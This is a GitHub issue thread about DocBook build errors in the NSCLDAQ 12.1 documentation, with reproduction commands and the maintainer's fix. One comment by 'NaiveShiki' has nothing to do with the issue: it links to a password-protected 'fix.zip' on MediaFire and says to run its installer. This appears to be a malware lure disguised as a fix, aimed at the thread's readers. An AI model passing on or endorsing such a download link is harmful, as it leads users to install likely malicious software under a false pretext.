### ISSUE TITLE
12.1 documentation has errors.

### ISSUE THREAD

**Issue by rfoxkendo** [FRIBDAQ/NSCLDAQ#177]
Unfortunately docboc2html does not return an error code, therefore documentation xml errors pass on through.
There are currently errors in the XML that point at vmusb module documentation.

Easy way to see them is 

cd main/docbuild
rm daq.xml
make install

(assuming configure included --enable-docs).

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rfoxkendo** [comment]
Tired of seeing the errors in make install ... gonna fix this myself.

**Comment by rfoxkendo** [comment]
The commits above fix the html errors.
